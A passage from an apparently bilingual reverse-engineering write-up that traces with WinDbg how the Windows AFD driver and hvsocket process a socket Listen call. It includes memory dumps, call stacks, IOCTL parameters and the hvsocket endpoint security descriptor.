<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f678 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> d7dfe086 45542bc3 00000004 00000610</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f688 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000022</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c – the buffer created by afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f698 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> cdb7c80a b1d00d3e 4570fe10 487662ad</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6a8 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> fffffffe 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6b8 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6c8 00000000 00000000 00000000 00000030</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6d8 00000022 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Data processing will pass through FastIo again. In this case search of the function, which handle IOCTL, is made in the table AfdImmediateCallDispatch. In our case Afd!AfdSetContext will become a case the handler. At the beginning, delivery of all APC to the current thread is turned off by means of nt!KeEnterGuardedRegion, contents of UserBuffer is copied to one of fields of structure _AFD_CONNECTION. Function finishes with nt!KeLeaveGuardedRegion call. We come back to the application.</span></div>
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Listen</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Далее серверное приложение вызывает Listen. UserMode рассматривать особо не будет, сразу обратимся к функции afd!AfdStartListen. Всё так же вызов идёт через ntdll!NtDeviceIoControlFile.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further the server application causes Listen. UserMode will especially not consider, at once we will address to the function afd!AfdStartListen. The call goes through ntdll!sNtDeviceIoControlFile.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F798</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1200B (afd!AfdStartListen)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F7A0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,C</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F6F7A0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f7a0 00000100 7fffffff 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the kernel InputBuffer it is compared to AfdUserProbeAddress, then SLIST_ENTRY is formed. In _AFD_CONNECTION structure in the field "type" writes 0xAFD4. Next afd!AfdRefTLBaseEndpoint is caused, then afd!AfdTLListen, from where hvsocket! VmbusTlProviderListen is caused, then hvsocket!VmbusTlCreateEndpoint is carried out, where nt!PsChargeProcessPoolQuota is caused. POOL_TYPE set to 200h (NonPagedPoolNx), process is current, then hvsocket!VmbusTlCreateObjectFromLookasideList is caused, next - nt! ExAlocatePoolWithTag with buffer the size 130h, the Vnpi tag, then hvsocket!VmbusTlInitializeObject, then work queue initialization is carried out (Netio!NetioInitializeWorkQueue) with the hvsocket!VmbusTlEndpointActionWorkQueueRoutine parameter, then hvsocket! VmbusTlAssociateListenerToPartition from where hvsocket!VmbusTlFindAndReferencePartitionByContainerId is caused.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlAssociateListenerToPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdStartListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket! VmbusTlResolvePartitionId, then hvsocket! VmbusTlGetPartitionListenerEndpoint, from where - hvsocket! VmbusTlFindOrCreateService, function comes to the end (in rax - 0), then there is a check to what partition we work - we receive HV_CHILDREN_GUID, again we cause hvsocket!VmbusTlFindOrCreateService, and once again hvsocket!VmbusTlFindOrCreateService, comes back to r14 0xC0000225.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further hvsocket! VmbusTlFindAndReferencePartition, then hvsocket! VmbusTlEndpointIsPrivileged is caused, Then next sequence:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_SeCaptureSubjectContextEx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rcx, [rbp+SubjectSecurityContext]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_SeLockSubjectContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_IoGetFileObjectGenericMapping</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Function returns _GENERIC_MAPPING struct:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GENERIC_MAPPING @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_GENERIC_MAPPING</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 GenericRead : 0x120089</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x004 GenericWrite : 0x120116</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x008 GenericExecute : 0x1200a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x00c GenericAll : 0x1f01ff</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then nt!SeAccessCheck, and nt!ObDereferenceSecurityDescriptor. Result of the hvsocket!VmbusTlEndpointIsPrivileged function at one of traces</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!error @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Error code: (NTSTATUS) </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xc0000022</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (3221225506) - {Access Denied} A process has requested access to an object, but has not been granted those access rights. (However, the last byte of result at the exit is nullified). </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In hvsocket there is a VmbusTlEndpointSecurityDescriptor variable</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!sd hvsocket!VmbusTlEndpointSecurityDescriptor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Revision: 0x1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Sbz1 : 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Control : 0x4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SE_DACL_PRESENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Owner : is NULL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Group : is NULL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->AclRevision: 0x2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Sbz1 : 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->AclSize : 0x34</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->AceCount : 0x2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Sbz2 : 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->AceFlags: 0x3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: OBJECT_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: CONTAINER_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->AceSize: 0x14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->Mask : 0x000f003f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->SID: S-1-5-18</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->AceFlags: 0x3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: OBJECT_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: CONTAINER_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->AceSize: 0x18</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->Mask : 0x000f003f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->SID: S-1-5-95-0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Sacl : is NULL</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlEndpointIsPrivileged returns c0000000, again hvsocket!VmbusTlFindOrCreateService is called.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlFindOrCreateService</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlAssociateListenerToPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderListen</span></div>
